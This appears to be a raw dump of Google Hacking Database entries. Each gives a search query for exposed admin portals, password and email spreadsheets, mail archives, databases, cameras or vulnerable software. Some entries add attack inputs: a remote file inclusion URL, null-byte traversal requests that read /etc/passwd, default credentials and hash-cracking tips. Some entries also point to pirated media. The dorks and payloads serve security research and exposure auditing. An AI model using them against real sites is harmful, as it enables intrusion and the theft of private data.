Web crackers are a distinct breed, and many do not comfort well with the draconian measures that many other crackers take, such as port and service scanning, the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with the only viable option to come in contact with a large number of proxies being to use public proxy lists. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.
Luckily google gives them another option, if they are smart enough to find it.
CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.
CGI-proxy's default page contains the text, as you can see in the demo on their site:
"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine."
The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:
inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"
More results can be obtained by admitting the "inurl:nph-proxy.cgi" constraint, but much more trash is generated as well.[descr]]
[[url]http://www.google.com/search?q=inurl:%22nph-proxy.cgi%22+%22Start+browsing+through+this+CGI-based+proxy%22&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"[dork]]
[end][531]]
[[start][532]
[[title]intitle:"Index of *" inurl:"my shared folder" size modified[[title]]
[[descr]These are index pages of "My Shared Folder". Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue. [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of+*%22+inurl%3A%22my+shared+folder%22+size+modified&btnG=Search[url]]
[[dork]intitle:"Index of *" inurl:"my shared folder" size modified[dork]]
[end][532]]
[[start][533]
[[title]E-market remote code execution[[title]]
[[descr]E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:
http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]
http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]
For more information read this:
http://echo.or.id/adv/adv06-y3dips-2004.txt
Author: y3dips
Date: Sept, 7th 2004
Location: Indonesian, Jakarta[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22%2Fbecommunity%2Fcommunity%2Findex.php%3Fpageurl%3D%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8[url]]
[[dork]inurl:"/becommunity/community/index.php?pageurl="[dork]]
[end][533]]
[[start][534]
[[title]filetype:pot inurl:john.pot[[title]]
[[descr]John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.
This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)
PS: This was posted to the "fun" forum, so don't take this too seriously ![descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apot+inurl%3Ajohn.pot+&btnG=Google+Search[url]]
[[dork]filetype:pot inurl:john.pot [dork]]
[end][534]]
[[start][543]
[[title]Gallery configuration setup files[[title]]
[[descr]Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.
We call it Gallery in Setup mode :)[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Agallery+inurl%3Asetup+%22Gallery+configuration%22&btnG=Search[url]]
[[dork]intitle:gallery inurl:setup "Gallery configuration"[dork]]
[end][543]]
[[start][544]
[[title]filetype:xls inurl:"email.xls"[title]]
[[descr]Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses.
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+inurl%3A%22email.xls%22+&btnG=Search[url]]
[[dork]filetype:xls inurl:"email.xls" [dork]]
[end][544]]
[[start][545]
[[title]filetype:xls inurl:"password.xls"[title]]
[[descr]Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds passwords. Think of this as a generic search, change the filetype or add keywords to get more specific.. you know what to do..[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+inurl%3A%22password.xls%22+&btnG=Search[url]]
[[dork]filetype:xls inurl:"password.xls" [dork]]
[end][545]]
[[start][546]
[[title]filetype:pdb pdb backup (Pilot | Pluckerdb)[[title]]
[[descr]Hotsync database files can be found using
"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your "x:\palm\{username}\backup"
The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).
Currently we don't know of a program to "read" these binary files.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apdb+pdb+backup+%28Pilot+%7C+Pluckerdb%29+&btnG=Google+Search[url]]
[[dork]filetype:pdb pdb backup (Pilot | Pluckerdb) [dork]]
[end][546]]
[[start][547]
[[title]filetype:pl "Download: SuSE Linux Openexchange Server CA"[title]]
[[descr]this search will get you on the web administration portal of linux open exchange servers.[descr]]
[[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=filetype%3Apl+%22Download%3A+SuSE+Linux+Openexchange+Server+CA%22+%0D%0A+%0D%0A&btnG=Google-Suche&meta=[url]]
[[dork]filetype:pl "Download: SuSE Linux Openexchange Server CA"
[dork]]
[end][547]]
[[start][548]
[[title]intitle:"dreambox web"[title]]
[[descr]this search will show web administration interfaces of linux dream boxes.
The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc. [descr]]
[[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3A%22dreambox+web%22+&btnG=Google-Suche&meta=[url]]
[[dork]intitle:"dreambox web" [dork]]
[end][548]]
[[start][549]
[[title]PHP-Nuke - create super user right now ![[title]]
[[descr]PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:
"Welcome to PHP-Nuke!
Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE."descr]]
[[url]http://www.google.com/search?q=%22create+the+Super+User%22+%22now+by+clicking+here%22[url]]
[[dork]"create the Super User" "now by clicking here"[dork]]
[end][549]]
[[start][550]
[[title]filetype:asp DBQ=" * Server.MapPath("*.mdb")[[title]]
[[descr]This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse.[descr]]
[[url]http://www.google.com/search?num=100&q=filetype%3Aasp+DBQ%3D%22+%26+Server.MapPath%28%22*.mdb%22%29[url]]
[[dork]filetype:asp DBQ=" & Server.MapPath("*.mdb")[dork]]
[end][550]]
[[start][551]
[[title]intitle:"TUTOS Login"[title]]
[[descr]TUTOS stands for "The Ultimate Team Organization Software." This search finds the login portals to TUTOS.
Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22TUTOS+Login%22[url]]
[[dork]intitle:"TUTOS Login"[dork]]
[end][551]]
[[start][552]
[[title]"Login to Usermin" inurl:20000[[title]]
[[descr]Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Login+to+Usermin%22+inurl%3A20000[url]]
[[dork]"Login to Usermin" inurl:20000[dork]]
[end][552]]
[[start][553]
[[title]"Powered by AutoIndex PHP Script"[title]]
[[descr]AutoIndex is a PHP script that makes a table that lists the files in a directory, and lets users access the files and subdirectories. It includes searching, icons for each file type, an admin panel, uploads, access logging, file descriptions, and more.[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+AutoIndex+PHP+Script%22[url]]
[[dork]"Powered by AutoIndex PHP Script"[dork]]
[end][553]]
[[start][554]
[[title]filetype:lit lit (books|ebooks)[[title]]
[[descr]Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)
[descr]]
[[url]http://www.google.com/search?num=100&q=filetype%3Alit+lit+%28books%7Cebooks%29[url]]
[[dork]filetype:lit lit (books|ebooks)[dork]]
[end][554]]
[[start][555]
[[title]"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")[[title]]
[[descr]DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.
More:http://www.securityfocus.com/bid/11086/discussion/
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+*%3A+newtelligence%22+%28%22dasBlog+1.6%22%7C+%22dasBlog+1.5%22%7C+%22dasBlog+1.4%22%7C%22dasBlog+1.3%22%29&btnG=Search[url]]
[[dork]"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")[dork]]
[end][555]]
[[start][556]
[[title]Lotus Domino address books[[title]]
[[descr]This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. Most of them are password protected.[descr]]
[[url]http://www.google.com/search?num=100&q=inurl%3A%22%2Fnames.nsf%3FOpenDatabase%22+-inurl%3Agov[url]]
[[dork]inurl:"/names.nsf?OpenDatabase" -inurl:gov[dork]]
[end][556]]
[[start][557]
[[title]intitle:"Login - powered by Easy File Sharing Web Server"[title]]
[[descr]Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)". More information at: http://www.securityfocus.com/bid/11034/discussion/
An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3A%22Login+-+powered+by+Easy+File+Sharing+Web+Server%22+&btnG=Google+Search[url]]
[[dork]intitle:"Login - powered by Easy File Sharing Web Server" [dork]]
[end][557]]
[[start][558]
[[title]intitle:"Tomcat Server Administration"[title]]
[[descr]This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Tomcat+Server+Administration%22[url]]
[[dork]intitle:"Tomcat Server Administration"[dork]]
[end][558]]
[[start][559]
[[title]ez Publish administration[[title]]
[[descr]Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.
Vendor site: http://www.ez.no/
Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodified
Depending on the version two queries can used
Admin intitle:"eZ publish administration"
intitle:"Login" "Welcome to eZ publish administration"
Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions
[descr]]
[[url]http://www.google.com/search?q=Admin+intitle%3A%22eZ+publish+administration%22[url]]
[[dork]Admin intitle:"eZ publish administration"[dork]]
[end][559]]
[[start][560]
[[title]inurl:administrator "welcome to mambo"[title]]
[[descr]Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.
Vendor: http://www.mamboserver.com/
Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3
Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc[descr]]
[[url]http://www.google.com/search?q=inurl%3Aadministrator+%22welcome+to+mambo%22[url]]
[[dork]inurl:administrator "welcome to mambo"[dork]]
[end][560]]
[[start][561]
[[title]"Powered by DCP-Portal v5.5"[title]]
[[descr]DCP-Portal is more a community system than a CMS - it nevertheless calls itsself CMS. They have never seen a real CMS. Version 5.5 is vulnerable sql injection.
Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+DCP-Portal+v5.5%22[url]]
[[dork]"Powered by DCP-Portal v5.5"[dork]]
[end][561]]
[[start][562]
[[title]inurl:"typo3/index.php?u=" -demo[[title]]
[[descr]TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.
Vendor: http://www.typo3.com/
Vulns: http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc
[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22typo3%2Findex.php%3Fu%3D%22+-demo[url]]
[[dork]inurl:"typo3/index.php?u=" -demo[dork]]
[end][562]]
[[start][563]
[[title]intitle:index.of (inurl:fileadmin | intitle:fileadmin)[[title]]
[[descr]TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.
The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on. Normally no sensitive data will be stored here except the one made available in restricted areas.
Unprotected fileadmin directories can be found by an attacker using this query.
Vendor: http://www.typo3.com/[descr]]
[[url]http://www.google.com/search?q=intitle%3Aindex.of+%28inurl%3Afileadmin+%7C+intitle%3Afileadmin%29[url]]
[[dork]intitle:index.of (inurl:fileadmin | intitle:fileadmin)[dork]]
[end][563]]
[[start][564]
[[title]Quicksite demopages for Typo3[[title]]
[[descr]TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.
The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:
user:admin
password:password
If you want to login, again append "typo3" to the website dir.
Vendor: http://www.typo3.com/
An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities.[descr]]
[[url]http://www.google.com/search?q=%22FC+Bigfeet%22+-inurl%3Amail[url]]
[[dork]"FC Bigfeet" -inurl:mail[dork]]
[end][564]]
[[start][565]
[[title]site:netcraft.com intitle:That.Site.Running Apache[[title]]
[[descr]Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site.
So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.
This search is easily modified (replace "apache" for the other server software), thus adding yet another way to find the webserver software version info. [descr]]
[[url]http://www.google.com/search?q=site%3Anetcraft.com+intitle%3AThat.Site.Running+Apache[url]]
[[dork]site:netcraft.com intitle:That.Site.Running Apache[dork]]
[end][565]]
[[start][566]
[[title]ext:log "Software: Microsoft Internet Information Services *.*"[title]]
[[descr]Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..
Examples:
12:09:37 194.236.57.10 [2501]USER micze 331
12:09:38 194.236.57.10 [2501]PASS - 230
08:30:38 194.236.57.10 [2416]DELE com-gb97.mdb
2000-06-18 15:08:30 200.16.212.225 activeip\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -[descr]]
[[url]http://www.google.com/search?q=ext:log+%22Software:+Microsoft+Internet+Information+Services+*.*%22[url]]
[[dork]ext:log "Software: Microsoft Internet Information Services *.*"[dork]]
[end][566]]
[[start][567]
[[title]filetype:cgi inurl:tseekdir.cgi[[title]]
[[descr]The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:
/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00
More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html[descr]]
[[url]http://www.google.com/search?q=filetype%3Acgi+inurl%3Atseekdir.cgi[url]]
[[dork]filetype:cgi inurl:tseekdir.cgi[dork]]
[end][567]]
[[start][568]
[[title]"Powered by phpOpenTracker" Statistics[[title]]
[[descr]phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.php
A prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking. [descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+phpOpenTracker%22+Statistics+&btnG=Google+Search[url]]
[[dork]"Powered by phpOpenTracker" Statistics [dork]]
[end][568]]
[[start][569]
[[title]filetype:vcs vcs[[title]]
[[descr]Filext.com says: "Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written."
The most common use is the "vCalendar File", used by Outlook for example. It can also belong to a "Palm vCal Desktop Application". For those who prefer clean searches, try these variations (with less results):
"PRODID: PalmDesktop Generated"
filetype:vcs VCALENDAR
filetype:vcs BEGIN:VCALENDAR
[descr]]
[[url]http://www.google.com/search?num=100&q=filetype%3Avcs+vcs[url]]
[[dork]filetype:vcs vcs[dork]]
[end][569]]
[[start][581]
[[title]filetype:config config intext:appSettings "User ID"[title]]
[[descr]These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public.[descr]]
[[url]http://www.google.com/search?q=filetype%3Aconfig+config+intext%3AappSettings+%22User+ID%22[url]]
[[dork]filetype:config config intext:appSettings "User ID"[dork]]
[end][581]]
[[start][582]
[[title]inurl:"/catalog.nsf" intitle:catalog[[title]]
[[descr]This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too. An attacker can back the url down to the "/catalog.nsf" part if needed.[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22%2Fcatalog%2Ensf%22+intitle%3Acatalog[url]]
[[dork]inurl:"/catalog.nsf" intitle:catalog[dork]]
[end][582]]
[[start][583]
[[title]filetype:pst inurl:"outlook.pst"[title]]
[[descr]All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.
An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Apst+inurl%3A%22outlook.pst%22[url]]
[[dork]filetype:pst inurl:"outlook.pst"[dork]]
[end][583]]
[[start][585]
[[title]"index of/" "ws_ftp.ini" "parent directory"[title]]
[[descr]This search is a cleanup of a previous entry by J0hnny. It uses "parent directory" to avoid results other than directory listings.
WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords.
There is another way to find this file, that was added by Xewan:
In our experience it's good to try both methods, as the results will differ quite a bit.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&q=%22index+of%2F%22+%22ws_ftp.ini%22+%22parent+directory%22[url]]
[[dork]"index of/" "ws_ftp.ini" "parent directory"[dork]]
[end][585]]
[[start][586]
[[title]filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)[[title]]
[[descr]Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability.
http://securityfocus.com/bid/11148/discussion/[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aphp+inurl%3Aindex.php+inurl%3A%22module%3Dsubjects%22+inurl%3A%22func%3D*%22+%28listpages%7C+viewpage+%7C+listcat%29&btnG=Google+Search[url]]
[[dork]filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)[dork]]
[end][586]]
[[start][587]
[[title]filetype:cgi inurl:pdesk.cgi[[title]]
[[descr]PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.
http://www.securitytracker.com/alerts/2004/Sep/1011276.html
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Acgi+inurl%3Apdesk.cgi&btnG=Search[url]]
[[dork]filetype:cgi inurl:pdesk.cgi[dork]]
[end][587]]
[[start][588]
[[title]ext:ldif ldif[[title]]
[[descr]www.filext.com says LDIF = LDAP Data Interchange Format.
LDAP is used for nearly everything in our days, so this file may include some juice info for attackers. They can add INTEXT:keyword to get more specific targets.
[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=ext%3Aldif+ldif&btnG=Google+Search[url]]
[[dork]ext:ldif ldif[dork]]
[end][588]]
[[start][589]
[[title]inurl:mewebmail[[title]]
[[descr]MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.
This search is a portal search. If finds the logins screens. If a vulnerability is found, this search becomes the target base for an attacker.[descr]]
[[url]http://www.google.com/search?q=inurl:mewebmail&hl=en&lr=&ie=UTF-8&filter=0[url]]
[[dork]inurl:mewebmail[dork]]
[end][589]]
[[start][590]
[[title]"Powered by IceWarp Software" inurl:mail[[title]]
[[descr]IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.
There are two ways to find installations of IceWarp:
"Powered by IceWarp Software" inurl:mail
intitle:"IceWarp Web Mail" inurl:":32000/mail/"
http://www.securityfocus.com/bid/10920[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+IceWarp+Software%22+inurl%3Amail[url]]
[[dork]"Powered by IceWarp Software" inurl:mail[dork]]
[end][590]]
[[start][591]
[[title]inurl:/_layouts/settings[[title]]
[[descr]With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/
Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full "Edit, Add and Delete access" to the information, which in case of malicious users may cause loss of important data.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][591]]
[[start][592]
[[title]intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)[[title]]
[[descr]The remote user can reportedly view the first string of any file on the system where script installed. This is a very old bug, but some sites never upgraded their MRTG installations.
http://www.securitytracker.com/alerts/2002/Feb/1003426.html
An attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:
ERROR: CFG Error Unknown Option "root:x:0:1:super-user:/" on line 2 or above.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22MRTG%2FRRD%22+1.1*+%28inurl%3Amrtg.cgi+%7C+inurl%3A14all.cgi+%7Ctraffic.cgi%29+&btnG=Search[url]]
[[dork]intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi) [dork]]
[end][592]]
[[start][593]
[[title]filetype:mdb wwforum[[title]]
[[descr]Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).
vendor: http://www.webwizguide.info/web_wiz_forums/
The forum database contains the members passwords, either encrypted or in plain text, depending on the version.
Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker.[descr]]
[[url]http://www.google.com/search?q=filetype%3Amdb+wwforum[url]]
[[dork]filetype:mdb wwforum[dork]]
[end][593]]
[[start][594]
[[title]"Powered By Elite Forum Version *.*"[title]]
[[descr]Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:
<#!LNUM!#>4<#!ENDLNUM!#>
<#!MAXID!#>2<#!ENDMAXID!#>
<#!USER!#>
<#!UNAME!#>administrat<#!ENDUNAME!#>
<#!PWORD!#>4571XXX367b52XXXb33b6ce74df1e017<#!ENDPWORD!#>
<#!DBID!#>0<#!ENDDBID!#>
<#!ENDUSER!#>
(data was xx'd)
These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum.[descr]]
[[url]http://www.google.com/search?q=%22Powered+By+Elite+Forum+Version+*.*%22[url]]
[[dork]"Powered By Elite Forum Version *.*"[dork]]
[end][594]]
[[start][595]
[[title]intitle:"microsoft certificate services" inurl:certsrv[[title]]
[[descr]Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as "proof" that someone or something is what they claim they are.
The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).
Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22microsoft+certificate+services%22+inurl%3Acertsrv&btnG=Search[url]]
[[dork]intitle:"microsoft certificate services" inurl:certsrv[dork]]
[end][595]]
[[start][596]
[[title]intitle:"webadmin - /*" filetype:php directory filename permission[[title]]
[[descr]Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. If left unprotected an attacker files can be modified or added on the server.
More info and screenshot at: http://cker.name/webadmin/[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22webadmin+-+%2F*%22+f[url]]
[[dork]intitle:"webadmin - /*" f[dork]]
[end][596]]
[[start][598]
[[title]intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)[[title]]
[[descr]First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack.
Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical files
http://www.securiteam.com/unixfocus/5SP081F80K.htm[descr]]
[[url]http://www.google.com/search?num=100&&q=intitle%3AAnswerBook2+inurl%3Aab2%2F+%28inurl%3A8888+%7C+inurl%3A8889%29[url]]
[[dork]intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)[dork]]
[end][598]]
[[start][599]
[[title]More Axis netcams ![[title]]
[[descr]More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the "view/view.shtml" URL identifier. Models found with this search are:
AXIS 205 version 4.02
AXIS 206M Network Camera version 4.10
AXIS 206W Network Camera version 4.10
AXIS 211 Network Camera version 4.02
AXIS 241S Video Server version 4.02
AXIS 241Q Video Server version 4.01
Axis 2100 Network Camera
Axis 2110 Network Camera 2.34
Axis 2120 Network Camera 2.40
AXIS 2130R PTZ Network Camera
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml%5E[url]]
[[dork]intitle:"Live View / - AXIS" | inurl:view/view.shtml^[dork]]
[end][599]]
[[start][600]
[[title]intitle:"The AXIS 200 Home Page"[title]]
[[descr]The Axis 200 HOME pages reside within the AXIS 200 device and hold information about the current software version, technical documentation, some howto's and the device settings.[descr]]
[[url]http://www.google.com/search?q=intitle:%22The+AXIS+200+Home+Page%22[url]]
[[dork]intitle:"The AXIS 200 Home Page"[dork]]
[end][600]]
[[start][601]
[[title]("Fiery WebTools" inurl:index2.html) | "WebTools enable * * observe, *, * * * flow * print jobs"[title]]
[[descr]Fiery WebTools offers many of the same capabilities of the Command WorkStation™, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%28%22Fiery+WebTools%22+inurl%3Aindex2.html%29+%7C+%22WebTools+enable+*+*+observe%2C+*%2C+*+*+*+flow+*+print+jobs%22&btnG=Search[url]]
[[dork]("Fiery WebTools" inurl:index2.html) | "WebTools enable * * observe, *, * * * flow * print jobs"[dork]]
[end][601]]
[[start][602]
[[title]Konica Network Printer Administration[[title]]
[[descr]This finds Konica Network Printer Administration pages. There is one result at the time of writing.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22network+administration%22+inurl%3A%22nic%22[url]]
[[dork]intitle:"network administration" inurl:"nic"[dork]]
[end][602]]
[[start][603]
[[title]Aficio 1022[[title]]
[[descr]The Ricoh Aficio 1022 is a digital multifunctional B&W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities.
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Asts_index.cgi[url]]
[[dork]inurl:sts_index.cgi[dork]]
[end][603]]
[[start][604]
[[title]intitle:RICOH intitle:"Network Administration"[title]]
[[descr]Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600.[descr]]
